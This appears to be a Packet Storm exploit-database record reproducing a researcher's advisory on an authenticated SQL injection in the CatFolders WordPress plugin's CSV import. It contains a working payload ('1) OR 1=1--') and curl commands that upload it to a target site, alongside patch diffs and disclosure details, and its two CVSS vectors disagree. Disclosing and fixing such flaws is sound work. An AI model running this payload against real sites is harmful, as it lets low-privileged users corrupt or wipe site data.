📄 WordPress CatFolders 2.5.2 SQL Injection_PACKETSTORM:220601

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

WordPress CatFolders plugin versions 2.5.2 and below suffer from a remote SQL injection vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:220601

Published May 8, 2026 at 00:00

Affected Product

Affected Versions # CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin

[![CVE](https://img.shields.io/badge/CVE-2025--9776-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9776)
[![CVSS Score](https://img.shields.io/badge/CVSS-6.5%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)
[![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/catfolders/)
[![CWE-89](https://img.shields.io/badge/CWE-89-critical)](https://cwe.mitre.org/data/definitions/89.html)
[![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)

> **Keywords:** CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025

## Table of Contents

- [Overview](#overview)
- [Vulnerability Details](#vulnerability-details)
- [Technical Analysis](#technical-details)
- [Proof of Concept](#proof-of-concept)
- [Remediation Guide](#remediation)
- [CVSS Metrics](#cvss-v31-metrics)
- [References](#references)
- [Security Contact](#contact)

## Overview

An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.

**Discovered by:** Kai Aizen (SnailSploit)
**Published:** 2025
**CVSS Score:** 6.5 (Medium)
**CWE:** CWE-89 - SQL Injection

## Vulnerability Details

### Description

CatFolders – Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The `attachments` column from a user-supplied CSV is split into a list and passed directly to `FolderModel::set_attachments()` which concatenates those values into raw SQL `IN (...)` clauses without proper sanitization or parameterization.

### Impact

This vulnerability allows authenticated attackers with Author-level privileges to:
- Execute arbitrary SQL queries
- Mass deletion or manipulation of folder-attachment mappings
- Potential data exposure depending on payload and database structure
- Compromise database integrity and availability

### Affected Versions

- **Vulnerable:** All versions ≤ 2.5.2
- **Patched:** Version 2.5.3 and above (verify with vendor)

### CVSS v3.1 Metrics

```
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
```

| Metric | Value |
|--------|-------|
| Attack Vector | Network (AV:N) |
| Attack Complexity | Low (AC:L) |
| Privileges Required | Low (PR:L) - Author+ |
| User Interaction | None (UI:N) |
| Scope | Unchanged (S:U) |
| Confidentiality | None (C:N) |
| Integrity | Low (I:L) |
| Availability | Low (A:L) |

## Technical Details

### Vulnerable Code Path

The vulnerability exists in the CSV import workflow:

**File:** `includes/Rest/Controllers/ImportController.php`

1. The `import_csv` method parses uploaded CSV without per-field sanitization
2. `restore_folders()` calls:
```php
FolderModel::set_attachments(
$new_folder['id'],
explode(',', $folder['attachments']),
false
);
```

**File:** `includes/Models/FolderModel.php`

3. `set_attachments()` builds raw SQL using string concatenation:
```php
'raw' => 'post_id IN (' . $attachmentIds . ')'
```

4. Each element is **not** cast to integer nor parameterized, allowing SQL injection

### Attack Vector

An attacker with Author-level privileges (`upload_files` capability) can inject malicious SQL through the CSV import endpoint:

**Malicious CSV payload:**
```csv
id,name,attachments
1,Test Folder,"1) OR 1=1--"
```

**Resulting vulnerable query:**
```sql
SELECT folder_id FROM wp_catf_folder_posts
WHERE post_id IN (1) OR 1=1--)
```

This breaks out of the `IN(...)` clause and alters query semantics, potentially affecting all rows.

### Prerequisites

- Author-level account (or higher) on target WordPress site
- CatFolders plugin installed and active
- Access to the REST API import endpoint

## Proof of Concept

### Step 1: Discover the REST Namespace

```bash
curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'
```

Typical result: `/catf/v1/import-csv`

### Step 2: Prepare Malicious CSV

Create a file named `catf_inject.csv`:

```csv
id,name,attachments
1,Malicious Folder,"1) OR 1=1--"
```

### Step 3: Execute the Attack

```bash
NS="/catf/v1" # Replace with discovered namespace

curl -i \
-u 'author_user:APPLICATION_PASSWORD' \
-F "file=@catf_inject.csv;type=text/csv" \
-X POST "https://target.site/wp-json${NS}/import-csv"
```

**Expected response:**
```json
{ "success": true }
```

### Impact Demonstration

The server constructs and executes:
```sql
SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)
```

This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.

### Safe Testing Environment

Run the standalone SQLite simulation to observe the vulnerability safely:

```bash
python3 poc/catfolders_sql_poc.py
```

This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.

## Remediation

### For Site Administrators

**Immediate Action Required:**

1. Update CatFolders to version **2.5.3** or later
2. Review user accounts with Author-level or higher privileges
3. Audit database logs for suspicious queries between affected dates
4. Check folder-attachment mappings for unexpected modifications

### For Developers

**Two minimal hardening steps:**

#### 1. Sanitize IDs Before Calling the Model

```diff
- FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
+ $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
+ if ( ! empty( $ids ) ) {
+ FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
+ }
```

#### 2. Enforce Integers Inside `set_attachments()`

```diff
$imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
+ $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );
```

### Stronger Recommendation

Replace **all** raw SQL concatenation with parameterized queries using WordPress's `$wpdb->prepare()`:

```php
$placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
$query = $wpdb->prepare(
"SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
...$imgIds
);
```

**Additionally:**
- Validate all CSV fields strictly before processing
- Implement input type validation at the API layer
- Add rate limiting to the import endpoint
- Log all import operations for audit trails

### Patch File

A complete patch is available in `patch/catfolders_fix.patch`

## Repository Structure

```
CVE-2025-9776/
├── README.md # This file
├── poc/
│ ├── catf_inject.csv # Malicious CSV payload
│ └── catfolders_sql_poc.py # Safe SQLite simulation
└── patch/
└── catfolders_fix.patch # Recommended fixes
```

## Timeline

- **Discovery Date:** 2025
- **Vendor Notification:** Coordinated disclosure via Wordfence
- **Public Disclosure:** 2025
- **Patch Available:** Version 2.5.3

## References

- [MITRE CVE Entry](https://www.cve.org/CVERecord?id=CVE-2025-9776)
- [Wordfence Intelligence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders/catfolders-tame-your-wordpress-media-library-by-category-252-authenticated-author-sql-injection-via-csv-import)
- [WordPress Plugin Directory](https://wordpress.org/plugins/catfolders/)
- [SnailSploit Research](https://snailsploit.com)

## Credits

**Researcher:** Kai Aizen (SnailSploit)

**Disclosure Process:** Coordinated through Wordfence Bug Bounty Program

## Ethical Considerations

**⚠️ IMPORTANT DISCLAIMER**

This Proof of Concept is provided **exclusively for defensive research and educational purposes**.

### Usage Guidelines

- ✅ **DO:** Test on your own systems or with explicit written authorization
- ✅ **DO:** Use for security training and awareness
- ✅ **DO:** Implement the fixes in your own code
- ❌ **DO NOT:** Test against systems without permission
- ❌ **DO NOT:** Use for malicious purposes
- ❌ **DO NOT:** Exploit in production environments

### Legal Notice

Unauthorized access to computer systems is illegal under laws including:
- Computer Fraud and Abuse Act (CFAA) - United States
- Computer Misuse Act - United Kingdom
- Similar legislation in other jurisdictions

**Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.**

## Contact

For questions or additional information about this vulnerability:
- **Email:** [email protected]
- **LinkedIn:** [linkedin.com/in/kaiaizen](https://linkedin.com/in/kaiaizen)
- **Website:** [snailsploit.com](https://snailsploit.com)
- **Organization:** SnailSploit Security Research

---

**Stay secure and keep your WordPress installations updated!**

*Last updated: October 13, 2025*



---

## 📚 Documentation & Author

This project's full writeup, methodology, and related research lives at:

**[https://snailsploit.com/security-research/cves/cve-2025-9776/](https://snailsploit.com/security-research/cves/cve-2025-9776/)**

Created by **Kai Aizen** — independent offensive security researcher.

[snailsploit.com](https://snailsploit.com) · [Research](https://snailsploit.com/research) · [Frameworks](https://snailsploit.com/frameworks) · [GitHub](https://github.com/SnailSploit) · [LinkedIn](https://linkedin.com/in/kaiaizen) · [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) · [X/Twitter](https://x.com/SnailSploit)

> *Same attack. Different substrate.*

{
    "lastseen": "2026-05-08T18:03:47",
    "description": "WordPress CatFolders plugin versions 2.5.2 and below suffer from a remote SQL injection vulnerability...",
    "published": "2026-05-08T00:00:00",
    "modified": "2026-05-08T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 WordPress CatFolders 2.5.2 SQL Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220601",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-9776"
    ],
    "sourceData": "# CVE-2025-9776: Authenticated SQL Injection in CatFolders WordPress Plugin\n    \n    [![CVE](https://img.shields.io/badge/CVE-2025--9776-red)](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9776)\n    [![CVSS Score](https://img.shields.io/badge/CVSS-6.5%20Medium-orange)](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator)\n    [![WordPress Plugin](https://img.shields.io/badge/WordPress-Plugin-blue)](https://wordpress.org/plugins/catfolders/)\n    [![CWE-89](https://img.shields.io/badge/CWE-89-critical)](https://cwe.mitre.org/data/definitions/89.html)\n    [![Wordfence](https://img.shields.io/badge/Disclosed-Wordfence-success)](https://www.wordfence.com/)\n    \n    > **Keywords:** CVE-2025-9776, CatFolders WordPress vulnerability, SQL injection WordPress, authenticated SQL injection, WordPress security, CSV import vulnerability, WordPress plugin exploit, CWE-89, WordPress database attack, media library vulnerability, WordPress CVE 2025\n    \n    ## Table of Contents\n    \n    - [Overview](#overview)\n    - [Vulnerability Details](#vulnerability-details)\n    - [Technical Analysis](#technical-details)\n    - [Proof of Concept](#proof-of-concept)\n    - [Remediation Guide](#remediation)\n    - [CVSS Metrics](#cvss-v31-metrics)\n    - [References](#references)\n    - [Security Contact](#contact)\n    \n    ## Overview\n    \n    An authenticated SQL Injection vulnerability was discovered in the CatFolders WordPress plugin that allows Author-level users to manipulate database queries through malicious CSV imports.\n    \n    **Discovered by:** Kai Aizen (SnailSploit)  \n    **Published:** 2025  \n    **CVSS Score:** 6.5 (Medium)  \n    **CWE:** CWE-89 - SQL Injection\n    \n    ## Vulnerability Details\n    \n    ### Description\n    \n    CatFolders \u2013 Tame Your WordPress Media Library by Category contains an authenticated SQL Injection vulnerability in the CSV import functionality. The `attachments` column from a user-supplied CSV is split into a list and passed directly to `FolderModel::set_attachments()` which concatenates those values into raw SQL `IN (...)` clauses without proper sanitization or parameterization.\n    \n    ### Impact\n    \n    This vulnerability allows authenticated attackers with Author-level privileges to:\n    - Execute arbitrary SQL queries\n    - Mass deletion or manipulation of folder-attachment mappings\n    - Potential data exposure depending on payload and database structure\n    - Compromise database integrity and availability\n    \n    ### Affected Versions\n    \n    - **Vulnerable:** All versions \u2264 2.5.2\n    - **Patched:** Version 2.5.3 and above (verify with vendor)\n    \n    ### CVSS v3.1 Metrics\n    \n    ```\n    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\n    ```\n    \n    | Metric | Value |\n    |--------|-------|\n    | Attack Vector | Network (AV:N) |\n    | Attack Complexity | Low (AC:L) |\n    | Privileges Required | Low (PR:L) - Author+ |\n    | User Interaction | None (UI:N) |\n    | Scope | Unchanged (S:U) |\n    | Confidentiality | None (C:N) |\n    | Integrity | Low (I:L) |\n    | Availability | Low (A:L) |\n    \n    ## Technical Details\n    \n    ### Vulnerable Code Path\n    \n    The vulnerability exists in the CSV import workflow:\n    \n    **File:** `includes/Rest/Controllers/ImportController.php`\n    \n    1. The `import_csv` method parses uploaded CSV without per-field sanitization\n    2. `restore_folders()` calls:\n    ```php\n    FolderModel::set_attachments( \n        $new_folder['id'], \n        explode(',', $folder['attachments']), \n        false \n    );\n    ```\n    \n    **File:** `includes/Models/FolderModel.php`\n    \n    3. `set_attachments()` builds raw SQL using string concatenation:\n    ```php\n    'raw' => 'post_id IN (' . $attachmentIds . ')'\n    ```\n    \n    4. Each element is **not** cast to integer nor parameterized, allowing SQL injection\n    \n    ### Attack Vector\n    \n    An attacker with Author-level privileges (`upload_files` capability) can inject malicious SQL through the CSV import endpoint:\n    \n    **Malicious CSV payload:**\n    ```csv\n    id,name,attachments\n    1,Test Folder,\"1) OR 1=1--\"\n    ```\n    \n    **Resulting vulnerable query:**\n    ```sql\n    SELECT folder_id FROM wp_catf_folder_posts \n    WHERE post_id IN (1) OR 1=1--)\n    ```\n    \n    This breaks out of the `IN(...)` clause and alters query semantics, potentially affecting all rows.\n    \n    ### Prerequisites\n    \n    - Author-level account (or higher) on target WordPress site\n    - CatFolders plugin installed and active\n    - Access to the REST API import endpoint\n    \n    ## Proof of Concept\n    \n    ### Step 1: Discover the REST Namespace\n    \n    ```bash\n    curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'\n    ```\n    \n    Typical result: `/catf/v1/import-csv`\n    \n    ### Step 2: Prepare Malicious CSV\n    \n    Create a file named `catf_inject.csv`:\n    \n    ```csv\n    id,name,attachments\n    1,Malicious Folder,\"1) OR 1=1--\"\n    ```\n    \n    ### Step 3: Execute the Attack\n    \n    ```bash\n    NS=\"/catf/v1\"  # Replace with discovered namespace\n    \n    curl -i \\\n      -u 'author_user:APPLICATION_PASSWORD' \\\n      -F \"file=@catf_inject.csv;type=text/csv\" \\\n      -X POST \"https://target.site/wp-json${NS}/import-csv\"\n    ```\n    \n    **Expected response:**\n    ```json\n    { \"success\": true }\n    ```\n    \n    ### Impact Demonstration\n    \n    The server constructs and executes:\n    ```sql\n    SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)\n    ```\n    \n    This may perform broader DELETE/INSERT operations than intended, often wiping folder-attachment relationships across the entire database.\n    \n    ### Safe Testing Environment\n    \n    Run the standalone SQLite simulation to observe the vulnerability safely:\n    \n    ```bash\n    python3 poc/catfolders_sql_poc.py\n    ```\n    \n    This prints the vulnerable query and demonstrates how a malicious token returns all rows, while a parameterized version properly rejects it.\n    \n    ## Remediation\n    \n    ### For Site Administrators\n    \n    **Immediate Action Required:**\n    \n    1. Update CatFolders to version **2.5.3** or later\n    2. Review user accounts with Author-level or higher privileges\n    3. Audit database logs for suspicious queries between affected dates\n    4. Check folder-attachment mappings for unexpected modifications\n    \n    ### For Developers\n    \n    **Two minimal hardening steps:**\n    \n    #### 1. Sanitize IDs Before Calling the Model\n    \n    ```diff\n    - FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );\n    + $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );\n    + if ( ! empty( $ids ) ) {\n    +     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );\n    + }\n    ```\n    \n    #### 2. Enforce Integers Inside `set_attachments()`\n    \n    ```diff\n      $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );\n    + $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );\n    ```\n    \n    ### Stronger Recommendation\n    \n    Replace **all** raw SQL concatenation with parameterized queries using WordPress's `$wpdb->prepare()`:\n    \n    ```php\n    $placeholders = implode(',', array_fill(0, count($imgIds), '%d'));\n    $query = $wpdb->prepare(\n        \"SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)\",\n        ...$imgIds\n    );\n    ```\n    \n    **Additionally:**\n    - Validate all CSV fields strictly before processing\n    - Implement input type validation at the API layer\n    - Add rate limiting to the import endpoint\n    - Log all import operations for audit trails\n    \n    ### Patch File\n    \n    A complete patch is available in `patch/catfolders_fix.patch`\n    \n    ## Repository Structure\n    \n    ```\n    CVE-2025-9776/\n    \u251c\u2500\u2500 README.md                    # This file\n    \u251c\u2500\u2500 poc/\n    \u2502   \u251c\u2500\u2500 catf_inject.csv         # Malicious CSV payload\n    \u2502   \u2514\u2500\u2500 catfolders_sql_poc.py   # Safe SQLite simulation\n    \u2514\u2500\u2500 patch/\n        \u2514\u2500\u2500 catfolders_fix.patch    # Recommended fixes\n    ```\n    \n    ## Timeline\n    \n    - **Discovery Date:** 2025\n    - **Vendor Notification:** Coordinated disclosure via Wordfence\n    - **Public Disclosure:** 2025\n    - **Patch Available:** Version 2.5.3\n    \n    ## References\n    \n    - [MITRE CVE Entry](https://www.cve.org/CVERecord?id=CVE-2025-9776)\n    - [Wordfence Intelligence Advisory](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders/catfolders-tame-your-wordpress-media-library-by-category-252-authenticated-author-sql-injection-via-csv-import)\n    - [WordPress Plugin Directory](https://wordpress.org/plugins/catfolders/)\n    - [SnailSploit Research](https://snailsploit.com)\n    \n    ## Credits\n    \n    **Researcher:** Kai Aizen (SnailSploit)\n    \n    **Disclosure Process:** Coordinated through Wordfence Bug Bounty Program\n    \n    ## Ethical Considerations\n    \n    **\u26a0\ufe0f IMPORTANT DISCLAIMER**\n    \n    This Proof of Concept is provided **exclusively for defensive research and educational purposes**.\n    \n    ### Usage Guidelines\n    \n    - \u2705 **DO:** Test on your own systems or with explicit written authorization\n    - \u2705 **DO:** Use for security training and awareness\n    - \u2705 **DO:** Implement the fixes in your own code\n    - \u274c **DO NOT:** Test against systems without permission\n    - \u274c **DO NOT:** Use for malicious purposes\n    - \u274c **DO NOT:** Exploit in production environments\n    \n    ### Legal Notice\n    \n    Unauthorized access to computer systems is illegal under laws including:\n    - Computer Fraud and Abuse Act (CFAA) - United States\n    - Computer Misuse Act - United Kingdom  \n    - Similar legislation in other jurisdictions\n    \n    **Use at your own risk. The researchers and SnailSploit assume no liability for misuse of this information.**\n    \n    ## Contact\n    \n    For questions or additional information about this vulnerability:\n    - **Email:** [email protected]\n    - **LinkedIn:** [linkedin.com/in/kaiaizen](https://linkedin.com/in/kaiaizen)\n    - **Website:** [snailsploit.com](https://snailsploit.com)\n    - **Organization:** SnailSploit Security Research\n    \n    ---\n    \n    **Stay secure and keep your WordPress installations updated!**\n    \n    *Last updated: October 13, 2025*\n    \n    <!-- snailsploit-backlink:start -->\n    \n    ---\n    \n    ## \ud83d\udcda Documentation & Author\n    \n    This project's full writeup, methodology, and related research lives at:\n    \n    **[https://snailsploit.com/security-research/cves/cve-2025-9776/](https://snailsploit.com/security-research/cves/cve-2025-9776/)**\n    \n    Created by **Kai Aizen** \u2014 independent offensive security researcher.\n    \n    [snailsploit.com](https://snailsploit.com) \u00b7 [Research](https://snailsploit.com/research) \u00b7 [Frameworks](https://snailsploit.com/frameworks) \u00b7 [GitHub](https://github.com/SnailSploit) \u00b7 [LinkedIn](https://linkedin.com/in/kaiaizen) \u00b7 [ResearchGate](https://www.researchgate.net/profile/Kai-Aizen-2) \u00b7 [X/Twitter](https://x.com/SnailSploit)\n    \n    > *Same attack. Different substrate.*\n    \n    <!-- snailsploit-backlink:end -->",
    "sourceHref": "https://packetstorm.news/download/220601",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220601/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply